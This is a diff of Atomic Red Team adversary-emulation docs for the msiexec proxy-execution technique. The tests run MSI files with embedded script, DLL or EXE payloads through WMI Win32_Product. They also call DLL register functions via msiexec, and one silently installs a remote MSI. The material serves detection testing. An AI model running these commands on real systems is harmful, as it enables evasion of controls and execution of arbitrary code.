+Executes an MSI containing embedded JScript code using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 882082f0-27c6-4eec-a43c-9aa80bccdb30
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_JScript.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
+Executes an MSI containing embedded VBScript code using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cf470d9a-58e7-43e5-b0d2-805dffc05576
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_VBScript.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
+Executes an MSI containing an embedded DLL using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 32eb3861-30da-4993-897a-42737152f5f8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_DLL.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
+Executes an MSI containing an embedded EXE using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 55080eb0-49ae-4f55-a440-4167b7974f79
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_EXE.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Msiexec.exe - Execute the DllRegisterServer function of a DLL
+Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "src" folder is only built for 64-bit, so this won't work on a 32-bit OS.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute that has an implemented DllRegisterServer function | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;MSIRunner.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+msiexec.exe /y "#{dll_payload}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The DLL must exist on disk at specified location (#{dll_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Msiexec.exe - Execute the DllUnregisterServer function of a DLL
+Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "src" folder is only built for 64-bit, so this won't work on a 32-bit OS.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ab09ec85-4955-4f9c-b8e0-6851baf4d47f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute that has an implemented DllUnregisterServer function | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;MSIRunner.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+msiexec.exe /z "#{dll_payload}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The DLL must exist on disk at specified location (#{dll_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Msiexec.exe - Execute Remote MSI file
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 44a4bedf-ffe3-452e-bee4-6925ab125662
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi|
 
 
 #### Attack Commands: Run with `command_prompt`! 
@@ -90,52 +519,4 @@ msiexec.exe /q /i "#{msi_payload}"
 
 
 
-<br/>
-<br/>
-
-## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL
-Execute arbitrary DLL file stored locally. Commonly seen in application installation.
-Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
-By default, if the src folder is not in place, it will download the 64 bit version.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;x64&#92;T1218.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-msiexec.exe /y "#{dll_payload}"
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
 <br/>